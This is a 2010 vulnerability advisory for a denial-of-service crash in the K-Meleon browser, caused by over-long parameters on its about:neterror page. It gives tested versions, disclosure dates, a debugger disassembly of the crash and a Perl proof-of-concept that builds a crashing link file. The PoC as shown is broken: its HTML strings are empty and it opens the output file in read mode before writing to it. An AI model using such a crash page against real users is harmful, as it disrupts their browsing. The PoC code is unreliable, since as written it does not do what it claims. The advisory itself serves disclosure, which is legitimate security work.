############################################ K-Meleon for windows about:neterror Stack Overflow DoS Vendor URL:http://kmeleon.sourceforge.net/ Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html Vendor notified:Yes exploit available: YES ############################################ K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems. K-Meleon is prone vulnerable to crashing with a very long URL... Internal web pages like about:neterror does not limit the amount of chars that a user put in 'c' 'd' params and them if we compose a malformed url the browser can be chash easy.This issue is exploitable via web links like click here or via window.location.replace('very long url') or similar vectors. ################# Versions Tested ################# I have tested this issue in win xp sp3 and a windows 7 fully pached. Win XP sp3: K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes ) K-Meleon 1.6.0a4 Vulnerables.(crashes) windows 7 Ultimate: K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes) K-Meleon 1.6.0a4 Vulnerables.(crashes) ############ References ############ Discovered: 29-07-2010 vendor notify:31-07-2010 Vendor Response: Vendor patch: ######################## ASM code stack overflow ######################## ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png CPU Disasm Address Hex dump Command 0043CB3F CC INT3 0043CB40 /$ 3D 00100000 CMP EAX,1000 0043CB45 |. 73 0E JNB SHORT 0043CB55 0043CB47 |. F7D8 NEG EAX 0043CB49 |. 03C4 ADD EAX,ESP 0043CB4B |. 83C0 04 ADD EAX,4 0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX 0043CB50 |. 94 XCHG EAX,ESP 0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX] 0043CB53 |. 50 PUSH EAX 0043CB54 |. C3 RETN 0043CB55 |> 51 PUSH ECX 0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1] 0043CB5A |> 81E9 00100000 /SUB ECX,1000 0043CB60 |. 2D 00100000 |SUB EAX,1000 0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow 0043CB67 |. 3D 00100000 |CMP EAX,1000 0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A 0043CB6E |. 2BC8 SUB ECX,EAX 0043CB70 |. 8BC4 MOV EAX,ESP 0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX 0043CB74 |. 8BE1 MOV ESP,ECX 0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX] 0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] 0043CB7B |. 50 PUSH EAX 0043CB7C \. C3 RETN 0043CB7D CC INT3 0043CB7E CC INT3 ################ #Proof Of Concept ################ ####################################################################### #!/usr/bin/perl # k-meleon Long "a href" Link DoS # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com # k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS # generate the file open it with k-keleon click in the link and wait a seconds ###################################################################### $archivo = $ARGV[0]; if(!defined($archivo)) { print "Usage: $0 \n"; } $cabecera = "" . "\n"; $payload = "click here if you can :)" . "\n"; $fin = ""; $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; close(FILE); exit; ################## EOF ###################### ############## Related Links ############## vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474 Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776 ###################### €nd ############################# Thnx to Phreak for support and let me undestanding the nature of this bug thnx to jajoni for test it in windows 7 X64 bits version. atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....